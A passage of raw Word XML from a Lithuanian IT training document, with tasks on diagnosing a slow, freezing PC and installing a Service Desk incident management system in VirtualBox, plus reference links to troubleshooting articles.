          <w:t>https://www.lifewire.com/how-to-fix-a-computer-that-wont-turn-on-2624450</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C742AA4" w14:textId="2FBEBC57" w:rsidR="3D065D9D" w:rsidRPr="005A5C28" w:rsidRDefault="4F984638" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Why won't my computer turn on? </w:t>
      </w:r>
      <w:r w:rsidR="629AA81B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(3030, </w:t>
      </w:r>
      <w:r w:rsidR="04F57376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">birželio 30). </w:t>
      </w:r>
      <w:r w:rsidR="73B6BC7D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer Hope.</w:t>
      </w:r>
      <w:r w:rsidR="73B6BC7D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="6DBACFAF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="27AAC450" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://www.computerhope.com/issues/ch000312.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A1949" w14:textId="3D5919D6" w:rsidR="10FA8B13" w:rsidRPr="005A5C28" w:rsidRDefault="10FA8B13" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA582D7" w14:textId="22A23C23" w:rsidR="31D21DAD" w:rsidRPr="005A5C28" w:rsidRDefault="2999FA91" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="0685B17A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="0685B17A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUSTATYTI KOMPIUTERINĖS SI</w:t>
      </w:r>
      <w:r w:rsidR="5E3D697A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0685B17A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TEMOS PROGRAMINĮ GEDIMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07F7A7" w14:textId="6CFADD45" w:rsidR="31D21DAD" w:rsidRPr="005A5C28" w:rsidRDefault="0685B17A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jums p</w:t>
      </w:r>
      <w:r w:rsidR="008F22C9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateikta</w:t>
      </w:r>
      <w:r w:rsidR="004B68D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterinė sistema (</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sta</w:t>
      </w:r>
      <w:r w:rsidR="00EB09C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>cionarus</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuteris ir monitorius). </w:t>
      </w:r>
      <w:r w:rsidR="1038CB66" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Operacinės sistema </w:t>
      </w:r>
      <w:r w:rsidR="00E37A7B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pasileidžia</w:t>
      </w:r>
      <w:r w:rsidR="1038CB66" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> lėtai, </w:t>
      </w:r>
      <w:r w:rsidR="5CFB7D23" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dažnai</w:t>
      </w:r>
      <w:r w:rsidR="1038CB66" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> stringa.</w:t>
      </w:r>
      <w:r w:rsidR="688591AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Hlk67816137"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Aprašy</w:t>
      </w:r>
      <w:r w:rsidR="008F22C9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="3F1F6403" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> galim</w:t>
      </w:r>
      <w:r w:rsidR="5ED25C45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7BC029D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gedim</w:t>
      </w:r>
      <w:r w:rsidR="5ABB38C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nurodykite</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="698D2E69" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> priežastį</w:t>
      </w:r>
      <w:r w:rsidR="00435529" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-is</w:t>
      </w:r>
      <w:r w:rsidR="00435529" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="3CF9B6B1" w14:textId="73431946" w:rsidR="00B8163F" w:rsidRPr="005A5C28" w:rsidRDefault="00B8163F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D611814" w14:textId="7B4FBC5A" w:rsidR="6BD42A58" w:rsidRPr="005A5C28" w:rsidRDefault="5AA378AF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD80C54" w14:textId="63D291C6" w:rsidR="6BD42A58" w:rsidRPr="005A5C28" w:rsidRDefault="681F453D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Barr</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> M. </w:t>
      </w:r>
      <w:r w:rsidR="5139D8A4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(20</w:t>
      </w:r>
      <w:r w:rsidR="759FB690" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="5139D8A4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="7C9F6A5A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gruodžio</w:t>
      </w:r>
      <w:r w:rsidR="5139D8A4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 13)</w:t>
      </w:r>
      <w:r w:rsidR="4C3DA334" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="5258F84D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why your PC is so slow... and how you can speed it up. </w:t>
      </w:r>
      <w:r w:rsidR="4870BAED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CCleaner.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:anchor=":~:text=Your%20operating%20system%20has%20to,that%20are%20running%20on%20it.&amp;text=Too%20many%20background%20programs,on%20Windows%20or%20driver%20updates">
        <w:r w:rsidR="5AA378AF" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.ccleaner.com/knowledge/why-your-pc-is-so-slow-and-how-you-can-speed-it-up#:~:text=Your%20operating%20system%20has%20to,that%20are%20running%20on%20it.&amp;text=Too%20many%20background%20programs,on%20Windows%20or%20driver%20updates oo%20many%20background%20programs,on%20Windows%20or%20driver%20updates</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="701CD914" w14:textId="51F4509C" w:rsidR="6BD42A58" w:rsidRPr="005A5C28" w:rsidRDefault="6ADA75A3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>My computer is running slow, what steps can I do to fix it?</w:t>
      </w:r>
      <w:r w:rsidR="748CEF11" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2020, gruodžio 31).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="748CEF11" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer Hope.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId69">
        <w:r w:rsidR="5AA378AF" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computerhope.com/issues/ch000179.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E394CC5" w14:textId="4337EDB0" w:rsidR="6BD42A58" w:rsidRPr="005A5C28" w:rsidRDefault="2B717403" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tips to improve PC performance in Windows 10. </w:t>
      </w:r>
      <w:r w:rsidR="6A9EA113" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Microsoft.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId70">
        <w:r w:rsidR="5AA378AF" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/windows/tips-to-improve-pc-performance-in-windows-10-b3b3ef5b-5953-fb6a-2528-4bbed82fba96</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07688CBB" w14:textId="79A90D79" w:rsidR="10FA8B13" w:rsidRPr="005A5C28" w:rsidRDefault="10FA8B13" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FAFDBA" w14:textId="5DEB9A66" w:rsidR="2574122E" w:rsidRPr="005A5C28" w:rsidRDefault="72427A05"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5</w:t>
      </w:r>
      <w:r w:rsidR="6B437433" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="6B437433" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0C7C1B5A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮDIEGTI</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0C7C1B5A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INC</w:t>
      </w:r>
      <w:r w:rsidR="268BC5D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="0C7C1B5A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DENTŲ VALDYMO S</w:t>
      </w:r>
      <w:r w:rsidR="104ADACF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ISTEMĄ</w:t>
      </w:r>
      <w:r w:rsidR="6B437433" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351D680" w14:textId="6BC6849F" w:rsidR="79E384F5" w:rsidRPr="005A5C28" w:rsidRDefault="3BAE1225"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 xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00293AE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>irtual</w:t>
      </w:r>
      <w:r w:rsidR="785B516B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00293AE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>oje</w:t>
      </w:r>
      <w:r w:rsidR="785B516B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> aplink</w:t>
      </w:r>
      <w:r w:rsidR="00293AE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>oje</w:t>
      </w:r>
      <w:r w:rsidR="785B516B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VirtualBox)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> įdie</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="34BFA626" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="19603FF3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>informacinę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44E68EEF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>incidentų</w:t>
      </w:r>
      <w:r w:rsidR="654C1500" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> valdymo sistemą</w:t>
      </w:r>
      <w:r w:rsidR="7BC9E7CC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Service Desk)</w:t>
      </w:r>
      <w:r w:rsidR="21E2F8C0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE6B44" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
